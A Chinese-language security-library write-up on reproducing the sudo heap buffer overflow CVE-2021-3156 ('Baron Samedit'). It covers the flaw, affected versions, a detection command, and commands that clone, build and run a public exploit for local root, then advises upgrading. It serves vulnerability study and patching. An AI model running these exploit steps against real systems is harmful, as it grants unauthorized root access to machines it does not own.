Sudo 堆缓冲区溢出漏洞 (CVE-2021-3156)复现–随梦-漏洞文库小世界-安全文库-NGC660安全实验室

Sudo 堆缓冲区溢出漏洞 (CVE-2021-3156)复现–随梦

一、漏洞简述

Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。
2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。
当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root权限,无需进行身份验证,且攻击者不需要知道用户密码。
安全研究人员于1月26日公开披露了此漏洞,并表示该漏洞已经隐藏了近十年。

二、受影响版本

Sudo 1.8.2 – 1.8.31p2
Sudo 1.9.0 – 1.9.5p1

三、环境概述

centos7

四、漏洞复现

1.查看sudo版本

sudo -V

1627544774966-2860664f-aa26-43bf-8da0-6eb0cdd7aeec

2. 漏洞检测

sudoedit -s /

在普通用户登录下
#返回以“ sudoedit:”开头的错误,则可能存在安全风险。
#返回以“ usage:”开头的错误响应,则无影响
1627544785033-100298be-3887-4f39-87a7-04533f4a7ae8

3. 漏洞复现

命令行执行以下命令

Git clone https://github.com/blasty/CVE-2021-3156.git 
cd CVE-2021-3156
make
./sudo-hax-me-a-sandwich 0/1/2

1627544837074-94c2143e-193e-4fb1-a68f-9cd98550f446 注:出现#, 表示漏洞利用成功。

五、修复建议

将sudo升级到安全版本
下载链接:https://www.sudo.ws/download.html

六、参考链接

https://www.freebuf.com/vuls/270839.html https://blog.csdn.net/weixin_43867542/article/details/118890604

请登录后发表评论

    请登录后查看回复内容